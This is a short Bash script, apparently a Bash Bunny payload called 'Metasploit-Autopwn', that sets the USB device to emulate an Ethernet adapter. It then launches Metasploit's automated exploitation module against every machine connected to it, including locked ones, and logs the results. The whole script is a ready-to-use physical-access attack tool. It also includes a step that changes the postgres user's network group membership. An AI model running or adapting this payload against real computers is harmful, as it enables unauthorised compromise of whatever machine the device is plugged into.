33 lines
1.3 KiB
Bash

#!/bin/bash
#
# Title: Metasploit-Autopwn
# Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
# Version: 0.1
#
#
# Runs Metasploit db_autopwn module against the whole dhcp clients conencted
# to the Bash Bunny device exploiting locked and unlocked machines that running
# vulnerable OSes or services.
# Prequisities:
# 1. Ruby 2.4.1 installed via rbenv (the best to have ruby installed without any problems)
# 2. You must have metasploit installation up and running in path /toos/metasploit-framework/
# 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
# 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
# Script
# LED SETUP................Setting up stuff
# LED ATTACK...............Running Metasploit Autopwn Module
# LED FINISH...............Attack Finished
LED SETUP
# One-time fix for adding user "postgres" to the network user groups
usermod -a -G netdev,systemd-network,net_raw postgres
CUCUMBER PLAID
ATTACKMODE RNDIS_ETHERNET
# Please adjust a nearest date/time
# date -s "20170830 01:23"
LED ATTACK
# For debugging we are writing the whole output into a file in /tools
/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto_pwn.rc >> /tools/msfAutopwnOUTPUT.txt
LED FINISH